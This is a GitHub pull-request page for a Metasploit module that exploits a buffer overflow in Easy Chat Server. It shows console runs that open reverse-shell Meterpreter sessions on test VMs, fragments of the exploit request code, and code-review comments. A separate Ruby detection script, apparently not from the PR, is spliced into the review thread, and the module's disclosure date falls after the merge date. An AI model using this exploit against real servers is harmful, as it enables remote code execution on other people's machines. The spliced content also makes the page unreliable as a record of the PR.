
Easy Chat Server 2 to 3.1 - Buffer overflow (SEH) exploit #8586

Merged
merged 5 commits into from Jul 14, 2017

Conversation

Mzack9999
Contributor

This module exploits a buffer overflow vulnerability in Easy Chat Server. Versions from 2 to 3.1 seem to be affected.

Verification

Tested on: Windows XP Sp3 English
Vulnerable application: http://echatserver.com/ecssetup.exe

Example output:

marco@kali:~$ msfconsole -q
msf > use exploit/windows/http/easychatserver_seh
msf exploit(easychatserver_seh) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(easychatserver_seh) > exploit
 
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Sending stage (957487 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200
 
meterpreter > sysinfo
Computer    	: MM-8B040C5B05D9
OS          	: Windows XP (Build 2600, Service Pack 3).
Architecture	: x86
System Language : en_US
Domain      	: WORKGROUP
Logged On Users : 2
Meterpreter 	: x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...
 
[*] 192.168.56.101 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(easychatserver_seh) >

Rank = NormalRanking

include Msf::Exploit::Remote::Tcp
#include Msf::Exploit::Remote::HttpClient
Contributor


Why?

Contributor Author


I used Msf::Exploit::Remote::Tcp with a direct socket connection because, with HttpClient, the payload opcodes somehow got a wrong encoding. Would it be better to change the implementation to use send_request_cgi with var_post?

Contributor


You should use the HTTP mixin if possible so you can get all the evasions and stuff.

@pbarry-r7 pbarry-r7 self-assigned this Jul 14, 2017
@pbarry-r7
Contributor

Verified against my XP SP3 x86 VM:

$ ./msfconsole -q
msf > use exploit/windows/http/easychatserver_seh
msf exploit(easychatserver_seh) > set rhost 10.0.2.15
rhost => 10.0.2.15
msf exploit(easychatserver_seh) > run

[*] Started reverse TCP handler on 10.0.2.4:4444 
[*] Sending stage (957487 bytes) to 10.0.2.15
[*] Meterpreter session 1 opened (10.0.2.4:4444 -> 10.0.2.15:1056) at 2017-07-14 15:12:35 -0500

meterpreter > getuid
Server username: PB-WINXP-VM\PB
meterpreter > sysinfo
Computer        : PB-WINXP-VM
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

Thanks for the submission, @Mzack9999!

@pbarry-r7 pbarry-r7 merged commit 66eb89e into rapid7:master Jul 14, 2017
@pbarry-r7
Contributor

pbarry-r7 commented Jul 14, 2017

Release Notes

The exploits/windows/http/easychatserver_seh module has been added to the framework. This new module exploits vulnerable versions of Easy Chat Server, a Windows web-based chat application, to gain remote code execution.

'ENCODER' => 'x86/alpha_mixed'
},
'DisclosureDate' => 'Oct 09 2017',
'DefaultTarget' => 0))
Contributor


I think you want to register TARGETURI.

sploit << rand_text_alpha_upper(200)

res = send_request_cgi({
'uri' => normalize_uri(URI,'registresult.htm'),
Contributor


This should be target_uri.path instead of URI...
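A detection-side counterpart to the request this module builds (a POST to registresult.htm carrying a 200-byte padded form field): an added example, not code from the PR or from Metasploit, that parses raw HTTP requests and flags form fields far longer than any legitimate registration value. The sample requests, the field names other than submit1, and the 100-byte threshold are constructed assumptions.

```ruby
require 'cgi'

# Form handler named in the module's send_request_cgi call.
TARGET_PATH = '/registresult.htm'
# Assumed cut-off: real registration fields are short, while the module's
# padding alone is 200 bytes of upper-case alphas.
MAX_FIELD_LEN = 100

# Parse a raw HTTP/1.x request string into method, path, and decoded form
# fields. Only application/x-www-form-urlencoded bodies are decoded.
def parse_request(raw)
  head, body = raw.split("\r\n\r\n", 2)
  request_line = head.lines.first.to_s.strip
  method, target, _version = request_line.split(' ', 3)
  path = target.to_s.split('?', 2).first
  fields = {}
  CGI.parse(body.to_s).each { |k, v| fields[k] = v.first.to_s } if body
  { method: method, path: path, fields: fields }
end

# Names of fields exceeding the threshold, or [] when the request is not a
# POST to the vulnerable handler or every field has a plausible length.
def suspicious_fields(raw, max_len = MAX_FIELD_LEN)
  req = parse_request(raw)
  return [] unless req[:method] == 'POST' && req[:path].end_with?(TARGET_PATH)
  req[:fields].select { |_k, v| v.bytesize > max_len }.keys
end

# Constructed sample traffic (field names other than submit1 are invented):
# one benign registration and one carrying an oversized field.
BENIGN_REQUEST = "POST /registresult.htm HTTP/1.1\r\nHost: chat.example\r\n" \
  "Content-Type: application/x-www-form-urlencoded\r\n\r\n" \
  "UserName=alice&Password=hunter2&submit1=Register"
OVERSIZED_REQUEST = "POST /registresult.htm HTTP/1.1\r\nHost: chat.example\r\n" \
  "Content-Type: application/x-www-form-urlencoded\r\n\r\n" \
  "UserName=#{'A' * 300}&Password=x&submit1=Register"

if __FILE__ == $PROGRAM_NAME
  [BENIGN_REQUEST, OVERSIZED_REQUEST].each do |r|
    hits = suspicious_fields(r)
    puts(hits.empty? ? 'ok' : "ALERT: oversized field(s) #{hits.join(', ')}")
  end
end
```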

'submit1' => 'Register'
}
})
handler
Contributor


This is redundant.

@Mzack9999 Mzack9999 deleted the easychatserver_seh branch March 16, 2018 21:26